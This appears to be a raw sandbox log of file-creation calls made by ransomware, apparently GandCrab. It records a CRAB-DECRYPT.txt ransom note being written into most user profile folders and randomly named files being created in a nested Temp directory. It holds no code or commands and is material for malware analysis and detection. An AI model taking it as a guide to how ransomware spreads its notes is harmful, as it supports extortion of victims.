Create C:\Documents and Settings\Default User\Application Data\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Cookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\My Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\My Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\My Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\My Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\NetHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\PrintHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Saved Games\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\SendTo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Start Menu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Start Menu\Programs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Start Menu\Programs\Accessibility\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Start Menu\Programs\Accessories\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Start Menu\Programs\Maintenance\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Start Menu\Programs\System Tools\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Start Menu\Programs\Windows PowerShell\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\ActiveSync\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt15.lst desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt15.lst desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt15.lst desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\UserCache.bin desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\DC\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\ACECache11.lst desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wscRGB.icc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wsRGB.icc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\ActiveSync\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Acrobat\DC\Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\AcroCef\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\AcroCef\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Color\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Color\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\ActiveSync\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\AcroCef\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Color\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Color\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\ActiveSync\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Color\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Color\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-e jJuv2TeKL.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-ZZr9xYkqr28kj4Ewly.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\0rGnGm QreoWsur9e.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1dIAUE6JjxOcRnUgYL.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1wJk.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2GRWsBis.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2nz3uSwqyVXWxqCOCF18.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\4229bD.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dBLEEVc8Nl3ui3b.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\DdyE 50uK2L.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dPo3pQlaA.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\F-PsEooiB7-oXDbtz1id.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fAfwVeyGLAK7P93Obz3Y.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hf1D.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hLFQVM89GDd j6TcCek.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\iEyof2ITfx5.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\KAwEoER.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\LtnS7XaVnVQol2Qn1xH.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\mLE9mf-BdFdOibSg9l.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\oUGX-5zbSZw.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\QZg7oH35.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\R6QY5M2ifYeXIFzAbryD.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Rw3B6OL.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\SDaC6UaMD-p1Jk.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\tVTfmiVg4ragt74J-.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\vO1f0VBn.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\WjWFRmK.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XL3UQ.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\YO5CdbmrFGoGb.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
